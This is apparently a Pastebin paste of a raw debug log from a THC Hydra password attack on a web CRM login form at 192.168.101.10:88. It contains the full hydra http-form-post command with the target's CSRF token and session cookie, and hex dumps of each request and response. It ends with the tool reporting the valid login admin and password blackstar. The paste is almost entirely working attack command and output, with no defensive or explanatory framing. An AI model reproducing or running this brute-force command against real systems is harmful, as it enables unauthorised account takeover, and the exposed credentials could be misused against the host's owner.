Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- hydra 192.168.101.10 -s 88 http-form-post "/index.php?module=Users&action=Login:__vtrftk=sid%ff663edfb6dc15257e23860aea5932cfceac57a8,1504200479&username=^USER^&password=^PASS^:F=error=1 PHPSESSID=5243380159a8026e9b91e" -l admin -p blackstar -t 20 -d
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- [DEBUG] Output color flag is 1
- Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-31 20:24:20
- [DEBUG] cmdline: hydra -s 88 -l admin -p blackstar -t 20 -d 192.168.101.10 http-form-post /index.php?module=Users&action=Login:__vtrftk=sid%ff663edfb6dc15257e23860aea5932cfceac57a8,1504200479&username=^USER^&password=^PASS^:F=error=1 PHPSESSID=5243380159a8026e9b91e
- [VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 1
- [DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
- [DATA] attacking http-post-form://192.168.101.10:88//index.php?module=Users&action=Login:__vtrftk=sid%ff663edfb6dc15257e23860aea5932cfceac57a8,1504200479&username=^USER^&password=^PASS^:F=error=1 PHPSESSID=5243380159a8026e9b91e
- [VERBOSE] Resolving addresses ...
- [DEBUG] resolving 192.168.101.10
- [VERBOSE] resolving done
- [DEBUG] Code: attack Time: 1504211060
- [DEBUG] Options: mode 0 ssl 0 restore 0 showAttempt 0 tasks 1 max_use 1 tnp 0 tpsal 0 tprl 0 exit_found 0 miscptr /index.php?module=Users&action=Login:__vtrftk=sid%ff663edfb6dc15257e23860aea5932cfceac57a8,1504200479&username=^USER^&password=^PASS^:F=error=1 PHPSESSID=5243380159a8026e9b91e service http-post-form
- [DEBUG] Brains: active 0 targets 1 finished 0 todo_all 1 todo 1 sent 0 found 0 countlogin 1 sizelogin 6 countpass 1 sizepass 10
- [DEBUG] Target 0 - target 192.168.101.10 ip 192.168.101.10 login_no 0 pass_no 0 sent 0 pass_state 0 redo_state 0 (0 redos) use_count 0 failed 0 done 0 fail_count 0 login_ptr admin pass_ptr blackstar
- [DEBUG] Task 0 - pid 0 active 0 redo 0 current_login_ptr (null) current_pass_ptr (null)
- [DEBUG] Tasks 1 inactive 0 active
- [DEBUG] child 0 got target 0 selected
- [DEBUG] child 0 spawned for target 0 with pid 3790
- [DEBUG] head_no 0 has pid 3790
- [DEBUG] head_no[0] read n
- [DEBUG] send_next_pair_init target 0, head 0, redo 0, redo_state 0, pass_state 0. loop_mode 0, curlogin (null), curpass (null), tlogin admin, tpass blackstar, logincnt 0/1, passcnt 0/1, loop_cnt 1
- [DEBUG] send_next_pair_mid done 1, pass_state 0, clogin admin, cpass blackstar, tlogin -p, tpass blackstar, redo 0
- [ATTEMPT] target 192.168.101.10 - login "admin" - pass "blackstar" - 1 of 1 [child 0] (0/0)
- DEBUG_CONNECT_OK
- [DEBUG] SEND [pid:3790] (108 bytes):
- 0000: 4745 5420 2f69 6e64 6578 2e70 6870 3f6d [ GET /index.php?m ]
- 0010: 6f64 756c 653d 5573 6572 7326 6163 7469 [ odule=Users&acti ]
- 0020: 6f6e 3d4c 6f67 696e 2048 5454 502f 312e [ on=Login HTTP/1. ]
- 0030: 300d 0a48 6f73 743a 2031 3932 2e31 3638 [ 0..Host: 192.168 ]
- 0040: 2e31 3031 2e31 300d 0a55 7365 722d 4167 [ .101.10..User-Ag ]
- 0050: 656e 743a 204d 6f7a 696c 6c61 2f35 2e30 [ ent: Mozilla/5.0 ]
- 0060: 2028 4879 6472 6129 0d0a 0d0a [ (Hydra).... ]
- [DEBUG] hydra_receive_line: waittime: 32, conwait: 0, socket: 5, pid: 3790
- [DEBUG] RECV [pid:3790] (445 bytes):
- 0000: 4854 5450 2f31 2e31 2033 3032 204d 6f76 [ HTTP/1.1 302 Mov ]
- 0010: 6564 2054 656d 706f 7261 7269 6c79 0d0a [ ed Temporarily.. ]
- 0020: 5365 7276 6572 3a20 6e67 696e 782f 312e [ Server: nginx/1. ]
- 0030: 362e 320d 0a44 6174 653a 2054 6875 2c20 [ 6.2..Date: Thu, ]
- 0040: 3331 2041 7567 2032 3031 3720 3138 3a32 [ 31 Aug 2017 18:2 ]
- 0050: 343a 3336 2047 4d54 0d0a 436f 6e74 656e [ 4:36 GMT..Conten ]
- 0060: 742d 5479 7065 3a20 7465 7874 2f68 746d [ t-Type: text/htm ]
- 0070: 6c3b 2063 6861 7273 6574 3d55 5446 2d38 [ l; charset=UTF-8 ]
- 0080: 0d0a 436f 6e6e 6563 7469 6f6e 3a20 636c [ ..Connection: cl ]
- 0090: 6f73 650d 0a58 2d50 6f77 6572 6564 2d42 [ ose..X-Powered-B ]
- 00a0: 793a 2050 4850 2f35 2e36 2e33 302d 302b [ y: PHP/5.6.30-0+ ]
- 00b0: 6465 6238 7531 0d0a 5365 742d 436f 6f6b [ deb8u1..Set-Cook ]
- 00c0: 6965 3a20 5048 5053 4553 5349 443d 3634 [ ie: PHPSESSID=64 ]
- 00d0: 3463 3636 6365 3539 6138 3534 3634 3030 [ 4c66ce59a8546400 ]
- 00e0: 3063 353b 2070 6174 683d 2f0d 0a45 7870 [ 0c5; path=/..Exp ]
- 00f0: 6972 6573 3a20 5468 752c 2031 3920 4e6f [ ires: Thu, 19 No ]
- 0100: 7620 3139 3831 2030 383a 3532 3a30 3020 [ v 1981 08:52:00 ]
- 0110: 474d 540d 0a43 6163 6865 2d43 6f6e 7472 [ GMT..Cache-Contr ]
- 0120: 6f6c 3a20 6e6f 2d73 746f 7265 2c20 6e6f [ ol: no-store, no ]
- 0130: 2d63 6163 6865 2c20 6d75 7374 2d72 6576 [ -cache, must-rev ]
- 0140: 616c 6964 6174 652c 2070 6f73 742d 6368 [ alidate, post-ch ]
- 0150: 6563 6b3d 302c 2070 7265 2d63 6865 636b [ eck=0, pre-check ]
- 0160: 3d30 0d0a 5072 6167 6d61 3a20 6e6f 2d63 [ =0..Pragma: no-c ]
- 0170: 6163 6865 0d0a 4c6f 6361 7469 6f6e 3a20 [ ache..Location: ]
- 0180: 696e 6465 782e 7068 703f 6d6f 6475 6c65 [ index.php?module ]
- 0190: 3d55 7365 7273 2670 6172 656e 743d 5365 [ =Users&parent=Se ]
- 01a0: 7474 696e 6773 2676 6965 773d 4c6f 6769 [ ttings&view=Logi ]
- 01b0: 6e26 6572 726f 723d 310d 0a0d 0a [ n&error=1.... ]
- [DEBUG] hydra_receive_line: waittime: 32, conwait: 0, socket: 5, pid: 3790
- [DEBUG] RECV [pid:3790] (0 bytes):
- DEBUG_DISCONNECT
- DEBUG_CONNECT_OK
- [DEBUG] SEND [pid:3790] (317 bytes):
- 0000: 504f 5354 202f 696e 6465 782e 7068 703f [ POST /index.php? ]
- 0010: 6d6f 6475 6c65 3d55 7365 7273 2661 6374 [ module=Users&act ]
- 0020: 696f 6e3d 4c6f 6769 6e20 4854 5450 2f31 [ ion=Login HTTP/1 ]
- 0030: 2e30 0d0a 486f 7374 3a20 3139 322e 3136 [ .0..Host: 192.16 ]
- 0040: 382e 3130 312e 3130 0d0a 5573 6572 2d41 [ 8.101.10..User-A ]
- 0050: 6765 6e74 3a20 4d6f 7a69 6c6c 612f 352e [ gent: Mozilla/5. ]
- 0060: 3020 2848 7964 7261 290d 0a43 6f6e 7465 [ 0 (Hydra)..Conte ]
- 0070: 6e74 2d4c 656e 6774 683a 2039 380d 0a43 [ nt-Length: 98..C ]
- 0080: 6f6e 7465 6e74 2d54 7970 653a 2061 7070 [ ontent-Type: app ]
- 0090: 6c69 6361 7469 6f6e 2f78 2d77 7777 2d66 [ lication/x-www-f ]
- 00a0: 6f72 6d2d 7572 6c65 6e63 6f64 6564 0d0a [ orm-urlencoded.. ]
- 00b0: 436f 6f6b 6965 3a20 5048 5053 4553 5349 [ Cookie: PHPSESSI ]
- 00c0: 443d 3634 3463 3636 6365 3539 6138 3534 [ D=644c66ce59a854 ]
- 00d0: 3634 3030 3063 350d 0a0d 0a5f 5f76 7472 [ 64000c5....__vtr ]
- 00e0: 6674 6b3d 7369 6425 6666 3636 3365 6466 [ ftk=sid%ff663edf ]
- 00f0: 6236 6463 3135 3235 3765 3233 3836 3061 [ b6dc15257e23860a ]
- 0100: 6561 3539 3332 6366 6365 6163 3537 6138 [ ea5932cfceac57a8 ]
- 0110: 2c31 3530 3432 3030 3437 3926 7573 6572 [ ,1504200479&user ]
- 0120: 6e61 6d65 3d61 646d 696e 2670 6173 7377 [ name=admin&passw ]
- 0130: 6f72 643d 626c 6163 6b73 7461 72 [ ord=blackstar ]
- HTTP request sent:[0A]POST /index.php?module=Users&action=Login HTTP/1.0[0D][0A]Host: 192.168.101.10[0D][0A]User-Agent: Mozilla/5.0 (Hydra)[0D][0A]Content-Length: 98[0D][0A]Content-Type: application/x-www-form-urlencoded[0D][0A]Cookie: PHPSESSID=644c66ce59a85464000c5[0D][0A][0D][0A]__vtrftk=sid%ff663edfb6dc15257e23860aea5932cfceac57a8,1504200479&username=admin&password=blackstar[0A]
- [DEBUG] hydra_receive_line: waittime: 32, conwait: 0, socket: 5, pid: 3790
- [DEBUG] RECV [pid:3790] (454 bytes):
- 0000: 4854 5450 2f31 2e31 2033 3032 204d 6f76 [ HTTP/1.1 302 Mov ]
- 0010: 6564 2054 656d 706f 7261 7269 6c79 0d0a [ ed Temporarily.. ]
- 0020: 5365 7276 6572 3a20 6e67 696e 782f 312e [ Server: nginx/1. ]
- 0030: 362e 320d 0a44 6174 653a 2054 6875 2c20 [ 6.2..Date: Thu, ]
- 0040: 3331 2041 7567 2032 3031 3720 3138 3a32 [ 31 Aug 2017 18:2 ]
- 0050: 343a 3336 2047 4d54 0d0a 436f 6e74 656e [ 4:36 GMT..Conten ]
- 0060: 742d 5479 7065 3a20 7465 7874 2f68 746d [ t-Type: text/htm ]
- 0070: 6c3b 2063 6861 7273 6574 3d55 5446 2d38 [ l; charset=UTF-8 ]
- 0080: 0d0a 436f 6e6e 6563 7469 6f6e 3a20 636c [ ..Connection: cl ]
- 0090: 6f73 650d 0a58 2d50 6f77 6572 6564 2d42 [ ose..X-Powered-B ]
- 00a0: 793a 2050 4850 2f35 2e36 2e33 302d 302b [ y: PHP/5.6.30-0+ ]
- 00b0: 6465 6238 7531 0d0a 4578 7069 7265 733a [ deb8u1..Expires: ]
- 00c0: 2054 6875 2c20 3139 204e 6f76 2031 3938 [ Thu, 19 Nov 198 ]
- 00d0: 3120 3038 3a35 323a 3030 2047 4d54 0d0a [ 1 08:52:00 GMT.. ]
- 00e0: 4361 6368 652d 436f 6e74 726f 6c3a 206e [ Cache-Control: n ]
- 00f0: 6f2d 7374 6f72 652c 206e 6f2d 6361 6368 [ o-store, no-cach ]
- 0100: 652c 206d 7573 742d 7265 7661 6c69 6461 [ e, must-revalida ]
- 0110: 7465 2c20 706f 7374 2d63 6865 636b 3d30 [ te, post-check=0 ]
- 0120: 2c20 7072 652d 6368 6563 6b3d 300d 0a50 [ , pre-check=0..P ]
- 0130: 7261 676d 613a 206e 6f2d 6361 6368 650d [ ragma: no-cache. ]
- 0140: 0a53 6574 2d43 6f6f 6b69 653a 2050 4850 [ .Set-Cookie: PHP ]
- 0150: 5345 5353 4944 3d61 3562 3562 6230 3664 [ SESSID=a5b5bb06d ]
- 0160: 3030 3036 3434 3933 6363 6535 3962 3734 [ 00064493cce59b74 ]
- 0170: 6132 3939 3335 313b 2070 6174 683d 2f0d [ a299351; path=/. ]
- 0180: 0a4c 6f63 6174 696f 6e3a 2069 6e64 6578 [ .Location: index ]
- 0190: 2e70 6870 3f6d 6f64 756c 653d 5573 6572 [ .php?module=User ]
- 01a0: 7326 7061 7265 6e74 3d53 6574 7469 6e67 [ s&parent=Setting ]
- 01b0: 7326 7669 6577 3d53 7973 7465 6d53 6574 [ s&view=SystemSet ]
- 01c0: 7570 0d0a 0d0a [ up.... ]
- [DEBUG] removing cookie PHPSESSID= in jar
- before: PHPSESSID=644c66ce59a85464000c5
- after:
- [DEBUG] hydra_receive_line: waittime: 32, conwait: 0, socket: 5, pid: 3790
- [DEBUG] RECV [pid:3790] (0 bytes):
- [DEBUG] attempt result: found 0, redirect 1, location: index.php?module=Users&parent=Settings&view=SystemSetup
- [DEBUG] host=192.168.101.10 redirect=/index.php?module=Users&parent=Settings&view=SystemSetup origin=/index.php?module=Users&action=Login
- [VERBOSE] Page redirected to http://:88/index.php?module=Users&parent=Settings&view=SystemSetup
- DEBUG_DISCONNECT
- DEBUG_CONNECT_OK
- [DEBUG] SEND [pid:3790] (226 bytes):
- 0000: 4745 5420 2f69 6e64 6578 2e70 6870 3f6d [ GET /index.php?m ]
- 0010: 6f64 756c 653d 5573 6572 7326 7061 7265 [ odule=Users&pare ]
- 0020: 6e74 3d53 6574 7469 6e67 7326 7669 6577 [ nt=Settings&view ]
- 0030: 3d53 7973 7465 6d53 6574 7570 2048 5454 [ =SystemSetup HTT ]
- 0040: 502f 312e 300d 0a48 6f73 743a 203a 3838 [ P/1.0..Host: :88 ]
- 0050: 0d0a 5573 6572 2d41 6765 6e74 3a20 4d6f [ ..User-Agent: Mo ]
- 0060: 7a69 6c6c 612f 352e 3020 2848 7964 7261 [ zilla/5.0 (Hydra ]
- 0070: 290d 0a43 6f6e 7465 6e74 2d4c 656e 6774 [ )..Content-Lengt ]
- 0080: 683a 2030 0d0a 436f 6e74 656e 742d 5479 [ h: 0..Content-Ty ]
- 0090: 7065 3a20 6170 706c 6963 6174 696f 6e2f [ pe: application/ ]
- 00a0: 782d 7777 772d 666f 726d 2d75 726c 656e [ x-www-form-urlen ]
- 00b0: 636f 6465 640d 0a43 6f6f 6b69 653a 2050 [ coded..Cookie: P ]
- 00c0: 4850 5345 5353 4944 3d36 3434 6336 3663 [ HPSESSID=644c66c ]
- 00d0: 6535 3961 3835 3436 3430 3030 6335 0d0a [ e59a85464000c5.. ]
- 00e0: 0d0a [ .. ]
- [DEBUG] hydra_receive_line: waittime: 32, conwait: 0, socket: 5, pid: 3790
- [DEBUG] RECV [pid:3790] (323 bytes):
- 0000: 4854 5450 2f31 2e31 2034 3030 2042 6164 [ HTTP/1.1 400 Bad ]
- 0010: 2052 6571 7565 7374 0d0a 5365 7276 6572 [ Request..Server ]
- 0020: 3a20 6e67 696e 782f 312e 362e 320d 0a44 [ : nginx/1.6.2..D ]
- 0030: 6174 653a 2054 6875 2c20 3331 2041 7567 [ ate: Thu, 31 Aug ]
- 0040: 2032 3031 3720 3138 3a32 343a 3337 2047 [ 2017 18:24:37 G ]
- 0050: 4d54 0d0a 436f 6e74 656e 742d 5479 7065 [ MT..Content-Type ]
- 0060: 3a20 7465 7874 2f68 746d 6c0d 0a43 6f6e [ : text/html..Con ]
- 0070: 7465 6e74 2d4c 656e 6774 683a 2031 3732 [ tent-Length: 172 ]
- 0080: 0d0a 436f 6e6e 6563 7469 6f6e 3a20 636c [ ..Connection: cl ]
- 0090: 6f73 650d 0a0d 0a3c 6874 6d6c 3e0d 0a3c [ ose....<html>..< ]
- 00a0: 6865 6164 3e3c 7469 746c 653e 3430 3020 [ head><title>400 ]
- 00b0: 4261 6420 5265 7175 6573 743c 2f74 6974 [ Bad Request</tit ]
- 00c0: 6c65 3e3c 2f68 6561 643e 0d0a 3c62 6f64 [ le></head>..<bod ]
- 00d0: 7920 6267 636f 6c6f 723d 2277 6869 7465 [ y bgcolor="white ]
- 00e0: 223e 0d0a 3c63 656e 7465 723e 3c68 313e [ ">..<center><h1> ]
- 00f0: 3430 3020 4261 6420 5265 7175 6573 743c [ 400 Bad Request< ]
- 0100: 2f68 313e 3c2f 6365 6e74 6572 3e0d 0a3c [ /h1></center>..< ]
- 0110: 6872 3e3c 6365 6e74 6572 3e6e 6769 6e78 [ hr><center>nginx ]
- 0120: 2f31 2e36 2e32 3c2f 6365 6e74 6572 3e0d [ /1.6.2</center>. ]
- 0130: 0a3c 2f62 6f64 793e 0d0a 3c2f 6874 6d6c [ .</body>..</html ]
- 0140: 3e0d 0a [ >.. ]
- [DEBUG] hydra_receive_line: waittime: 32, conwait: 0, socket: 5, pid: 3790
- [DEBUG] RECV [pid:3790] (0 bytes):
- [DEBUG] head_no[0] read F
- DEBUG_DISCONNECT
- [88][http-post-form] host: 192.168.101.10 login: admin password: blackstar
- [DEBUG] head_no[0] read n
- [STATUS] attack finished for 192.168.101.10 (waiting for children to complete tests)
- [DEBUG] head_no 0, kill 1, fail 0
- [DEBUG] all targets done and all heads finished
- [DEBUG] while loop left with 1
- 1 of 1 target successfully completed, 1 valid password found
- [DEBUG] killing all remaining children now that might be stuck
- Hydra (http://www.thc.org/thc-hydra) finished at 2017-08-31 20:24:22
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement